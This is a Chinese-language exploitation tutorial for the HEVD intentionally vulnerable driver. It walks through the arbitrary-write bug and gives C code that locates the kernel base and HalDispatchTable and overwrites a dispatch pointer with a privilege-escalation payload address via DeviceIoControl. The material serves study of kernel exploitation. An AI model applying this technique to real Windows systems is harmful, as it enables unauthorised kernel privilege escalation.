0x00前言

第六篇了讲任意内存覆盖对于本节还是容易理解的觉得发的有点没意义。。。。。因为有很多师傅都写过QAQ。。。。。。

0x01漏洞原理

基本概念是覆盖内核调度表中的指针将其指向shellcode的地址

函数分析

这个函数申请完内存后在漏洞版本下未检查what和where指针而是直接引用所以我们如果控制了what指针地址的值指向shellcode就可以完成利用
TriggerArbitraryWrite

NTSTATUS
TriggerArbitraryWrite(
    _In_ PWRITE_WHAT_WHERE UserWriteWhatWhere
)
{
    PULONG_PTR What = NULL;
    PULONG_PTR Where = NULL;
    NTSTATUS Status = STATUS_SUCCESS;
 
    PAGED_CODE();
 
    __try
    {
        //
        // Verify if the buffer resides in user mode
        //
 
        ProbeForRead((PVOID)UserWriteWhatWhere, sizeof(WRITE_WHAT_WHERE), (ULONG)__alignof(UCHAR));
 
        What = UserWriteWhatWhere->What;
        Where = UserWriteWhatWhere->Where;
 
        DbgPrint("[+] UserWriteWhatWhere: 0x%p\n", UserWriteWhatWhere);
        DbgPrint("[+] WRITE_WHAT_WHERE Size: 0x%X\n", sizeof(WRITE_WHAT_WHERE));
        DbgPrint("[+] UserWriteWhatWhere->What: 0x%p\n", What);
        DbgPrint("[+] UserWriteWhatWhere->Where: 0x%p\n", Where);
 
#ifdef SECURE
        //
        // Secure Note: This is secure because the developer is properly validating if address
        // pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead()/
        // ProbeForWrite() routine before performing the write operation
        //
 
        ProbeForRead((PVOID)What, sizeof(PULONG_PTR), (ULONG)__alignof(UCHAR));
        ProbeForWrite((PVOID)Where, sizeof(PULONG_PTR), (ULONG)__alignof(UCHAR));
 
        *(Where) = *(What);
#else
        DbgPrint("[+] Triggering Arbitrary Write\n");
 
        //
        // Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
        // because the developer is writing the value pointed by 'What' to memory location
        // pointed by 'Where' without properly validating if the values pointed by 'Where'
        // and 'What' resides in User mode
        //
 
        *(Where) = *(What);        //漏洞点
#endif
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }
 
    //
    // There is one more hidden vulnerability. Find it out.
    //
 
    return Status;
}

0x02漏洞分析

先下断点偏移计算就用之前的方法就可

1	`bp HEVD!TriggerArbitraryWrite+71`

查看what的值发现并不是shellcode的地址而是跳转表

下个断点单步运行几次发现到了shellcode的地址

what和where指针在WRITE_WHAT_WHERE结构体中前四个字节是what 后四个是where 对于IO控制码的问题还是跟之前一样在IDA中查看即可

typedef struct _WRITE_WHAT_WHERE {
        PULONG_PTR What;
        PULONG_PTR Where;
    } WRITE_WHAT_WHERE, *PWRITE_WHAT_WHERE;

我们需要将where指针覆盖到一个安全的地址先查看NtQueryIntervalProfile+0x62 然后查看KeQueryIntervalProfile 覆盖指针数组的即可这个函数在内核中用的很少所以可以覆盖

0x03漏洞利用

获取ntkrnlpa.exe基址

NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);
 
// Allocate the Heap chunk
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
                                                                 HEAP_ZERO_MEMORY,
                                                                 ReturnLength);
 
if (!pSystemModuleInformation) {
    DEBUG_ERROR("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
    exit(EXIT_FAILURE);
}
NtStatus = NtQuerySystemInformation(SystemModuleInformation,
                                    pSystemModuleInformation,
                                    ReturnLength,
                                    &ReturnLength);
 
if (NtStatus != STATUS_SUCCESS) {
    DEBUG_ERROR("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
    exit(EXIT_FAILURE);
}
 
KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;

get HalDispatchTable地址

// This is still in user mode
HalDispatchTable = (PVOID)GetProcAddress(hKernelInUserMode, "HalDispatchTable"); //用户模式加载ntokrnl.exe 
 
if (!HalDispatchTable) {
    DEBUG_ERROR("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError());
    exit(EXIT_FAILURE);
}
else {
    HalDispatchTable = (PVOID)((ULONG_PTR)HalDispatchTable - (ULONG_PTR)hKernelInUserMode); //得到HapDispatchTable偏移
 
    // Here we get the address of HapDispatchTable in Kernel mode
    HalDispatchTable = (PVOID)((ULONG_PTR)HalDispatchTable + (ULONG_PTR)KernelBaseAddressInKernelMode);
 
    DEBUG_INFO("\t\t\t[+] HalDispatchTable: 0x%p\n", HalDispatchTable);
}

调用

WriteWhatWhere = (PWRITE_WHAT_WHERE)HeapAlloc(GetProcessHeap(),
                                              HEAP_ZERO_MEMORY,
                                              sizeof(WRITE_WHAT_WHERE));
HalDispatchTable = GetHalDispatchTable();                                              
WriteWhatWhere->What = (PULONG_PTR)&EopPayload;
WriteWhatWhere->Where = (PULONG_PTR)HalDispatchTablePlus4;
 DeviceIoControl(hFile,
                HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE,
                (LPVOID)WriteWhatWhere,
                sizeof(WRITE_WHAT_WHERE),
                NULL,
                0,
                &BytesReturned,
                NULL);